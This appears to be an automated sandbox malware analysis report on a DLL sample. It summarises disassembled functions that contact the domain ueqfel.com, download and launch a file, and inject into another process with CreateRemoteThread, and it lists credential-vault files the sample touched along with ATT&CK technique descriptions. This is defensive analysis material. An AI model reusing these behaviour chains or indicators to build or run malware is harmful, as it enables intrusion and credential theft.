Instruction Fuzzy Hash: 0781EE71608398BEEB228F349C19BEA7BADEF41314F04165DE84A8E1C1C2F46B45C766

Function 00AA388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(00AA7584), ref: 00AA389F
Sleep.KERNEL32(0000EA60), ref: 00AA3911
InternetGetConnectedState.WININET(?,00000000), ref: 00AA392A
gethostbyname.WS2_32(0D278125), ref: 00AA396C
socket.WS2_32(00000002,00000001,00000000), ref: 00AA3981
ioctlsocket.WS2_32(?,8004667E), ref: 00AA399A
connect.WS2_32(?,?,00000010), ref: 00AA39B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00AA39C1
closesocket.WS2_32 ref: 00AA3A20

Strings

ueqfel.com, xrefs: 00AA38F1

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: ueqfel.com
API String ID: 159131500-2992884172
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: 88936c64ea0c52c5b29a61f320eb0a9722aecc75d2507062f6e6ad7ce3e28b23
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: F141B232644258BAEF319F248C4EB9A7B6EAF86710F044029F949DF1C1D7F59F408720

Function 7FE4388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(7FE47584), ref: 7FE4389F
Sleep.KERNEL32(0000EA60), ref: 7FE43911
InternetGetConnectedState.WININET(?,00000000), ref: 7FE4392A
gethostbyname.WS2_32(0D278125), ref: 7FE4396C
socket.WS2_32(00000002,00000001,00000000), ref: 7FE43981
ioctlsocket.WS2_32(?,8004667E), ref: 7FE4399A
connect.WS2_32(?,?,00000010), ref: 7FE439B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FE439C1
closesocket.WS2_32 ref: 7FE43A20

Strings

ueqfel.com, xrefs: 7FE438F1

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: ueqfel.com
API String ID: 159131500-2992884172
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: eea604ef3eef491c3b4b486964eb23317b1c68c5be79fae7d3127a3215423796
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: 4241B131644348BEEB218E209C49BE9BB6EEF85754F04512DF94ADE1C1D7F5AB40A720

Function 7FE407AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE4144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE4145A
Part of subcall function 7FE4144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE4146A

CloseHandle.KERNEL32(?), ref: 7FE405AD
FreeLibrary.KERNEL32(75670000,?,7FE4079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407B8
CloseHandle.KERNEL32(?,?,7FE4079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407C9
Process32First.KERNEL32 ref: 7FE407DC
Process32Next.KERNEL32 ref: 7FE407ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE40805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE40842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE4085D
CloseHandle.KERNEL32 ref: 7FE4086C

Strings

csrs, xrefs: 7FE4082C

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: a6d35856a40c53af25f3dd880ced36f98488441f4133b4430f7fa635e460986d
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: AB113030501205BBEB255F21DD49BBF3A6DEF54711F00112CF94B99081C6B49B018AAA

Function 00AA2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 00AA278C

Part of subcall function 00AA27A7: GetTempFileNameA.KERNEL32(?,00AA27A3,00000000,?), ref: 00AA27A8
Part of subcall function 00AA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AA27A3,00000000,?), ref: 00AA27C3
Part of subcall function 00AA27A7: InternetReadFile.WININET(?,?,00000104), ref: 00AA27DD
Part of subcall function 00AA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AA27A3,00000000,?), ref: 00AA27F3
Part of subcall function 00AA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AA27A3,00000000,?), ref: 00AA27FF
Part of subcall function 00AA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AA27A3), ref: 00AA2823
Part of subcall function 00AA27A7: InternetCloseHandle.WININET(?), ref: 00AA2833

InternetCloseHandle.WININET(00000000), ref: 00AA283A

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
String ID:
API String ID: 1995088466-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: d9822933de24f6d68b52bdae8fcbf8006a8d7a84b55493678d97a516dfc51314
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: A621AEB1144206BFE7215B24CC8AFEB3A2DEF96B10F000119FA499A0C2D7B19B1586A6

Function 7FE42768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE4278C

Part of subcall function 7FE427A7: GetTempFileNameA.KERNEL32(?,7FE427A3,00000000,?), ref: 7FE427A8
Part of subcall function 7FE427A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE427A3,00000000,?), ref: 7FE427C3
Part of subcall function 7FE427A7: InternetReadFile.WININET(?,?,00000104), ref: 7FE427DD
Part of subcall function 7FE427A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427F3
Part of subcall function 7FE427A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427FF
Part of subcall function 7FE427A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE427A3), ref: 7FE42823
Part of subcall function 7FE427A7: InternetCloseHandle.WININET(?), ref: 7FE42833

InternetCloseHandle.WININET(00000000), ref: 7FE4283A

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
String ID:
API String ID: 1995088466-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: d2f72ca38739e1223d228fa8915e7a2d59a899e2c4950480ab4928b4c105e288
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: C821D2B1145306BFE7215B20DC8EFFF3A2DEF95B10F000119FA4A99081D7B19A15C6BA

Function 00AA27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,00AA27A3,00000000,?), ref: 00AA27A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AA27A3,00000000,?), ref: 00AA27C3
InternetReadFile.WININET(?,?,00000104), ref: 00AA27DD
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AA27A3,00000000,?), ref: 00AA27F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AA27A3,00000000,?), ref: 00AA27FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AA27A3), ref: 00AA2823
InternetCloseHandle.WININET(?), ref: 00AA2833
InternetCloseHandle.WININET(00000000), ref: 00AA283A

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
String ID:
API String ID: 3452404049-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 8c088c9ed766d716a58091647d95b3bb05fcbf578a6812b173d67d6a82d5a051
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: 5A1161B1100606BBEB250B24CC49FFB7A2DEF95B10F004519FA0699080DBF55F5196A8

Function 7FE427A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE427A3,00000000,?), ref: 7FE427A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE427A3,00000000,?), ref: 7FE427C3
InternetReadFile.WININET(?,?,00000104), ref: 7FE427DD
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE427A3), ref: 7FE42823
InternetCloseHandle.WININET(?), ref: 7FE42833
InternetCloseHandle.WININET(00000000), ref: 7FE4283A

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
String ID:
API String ID: 3452404049-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 22dcc7b0365fcf1d6eb4fed4657db19a0a0b5e3cffdb9644fcda0f43dbdbc4f6
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: B8116DB1100606BBEB250F21DC4EFFF7A2DEF89B14F004519FA0699080DBF5AA5196A8

Function 00AA10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(039EF878), ref: 00AA113D
GetProcAddress.KERNEL32(00000000,00AA11D6), ref: 00AA1148

Strings

.DLL, xrefs: 00AA1133

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: 2d8b4caed2cf6f00cb4aad0bd3fe46e62c5c2354828cb9ad076a0f063405c334
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: A9019230607005FADFA59F6CC949AAA3B7DFF06355F10421CEA1A8B2D6C7708E808699

Function 7FE410CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(039EF878), ref: 7FE4113D
GetProcAddress.KERNEL32(00000000,7FE411D6), ref: 7FE41148

Strings

.DLL, xrefs: 7FE41133

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: ea4a2056f9d9eec985f90d0e6f51664608bc9cd6dcfcab51fc2ae76c9b6c8238
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: D301E130607204EACF538F38E945BBE3B7DEB04265F20211DF90A8A759C7789A408B95

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GeW4GzT8G8.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\18607d1f-3e87-41d7-b006-51bfc17e9538

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c8310f0f-9ec7-4a2b-8c40-fbafee991f65

Windows Analysis Report
GeW4GzT8G8.dll